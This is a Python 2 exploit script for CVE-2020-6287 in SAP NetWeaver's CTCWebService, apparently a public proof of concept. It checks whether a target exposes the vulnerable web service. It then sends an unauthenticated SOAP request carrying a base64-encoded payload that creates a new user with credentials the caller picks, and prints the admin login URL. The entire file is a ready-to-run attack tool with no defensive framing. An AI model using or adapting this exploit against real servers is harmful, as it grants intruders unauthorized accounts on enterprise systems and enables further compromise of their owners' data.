#from ducnt import <3
import requests
import base64
import sys


def check_vulnerable(_url):
	url = _url+"/CTCWebService/CTCWebServiceBean?wsdl"

	_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
	r = requests.get(url, headers=_headers, verify=False, timeout=5)
	if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
		print "Vulnerable"
		return True
	else:
		print "Not Vulnerable, matane :("
		return False


def add_user(_url, _username, _passwd):
	_check = check_vulnerable(_url)
	if _check:
		url = _url+"/CTCWebService/CTCWebServiceBean/ConfigServlet"

		_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

		_payload = "<root>  <user>    <JavaOrABAP>java</JavaOrABAP>    <username>"+str(_username)+"</username>    <password>"+str(_passwd)+"</password>    <userType></userType>  </user></root>"
		_payload = _payload.encode('base64')
		_data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\">  <soapenv:Header/>  <soapenv:Body>    <urn:executeSynchronious>        <identifier>          <component>sap.com/tc~lm~config~content</component>          <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path>       </identifier>       <contextMessages>          <baData>"+str(_payload)+"</baData>          <name>userDetails</name>       </contextMessages>    </urn:executeSynchronious>   </soapenv:Body></soapenv:Envelope>"
		r = requests.post(url, headers=_headers, verify=False, data=_data, timeout=10)

		if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
			print "Add user successfully with credential:\nUsername: ",_username," ==== Password: ",_passwd
			print "Login at: \n",_url+"/nwa"

def main():
	if len(sys.argv) < 4:
		print "Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port <username> <passwd>"
		exit()
	_url = sys.argv[1]
	_username = sys.argv[2]
	_passwd = sys.argv[3]
	add_user(_url, _username, _passwd)


if __name__ == "__main__": 
	main()

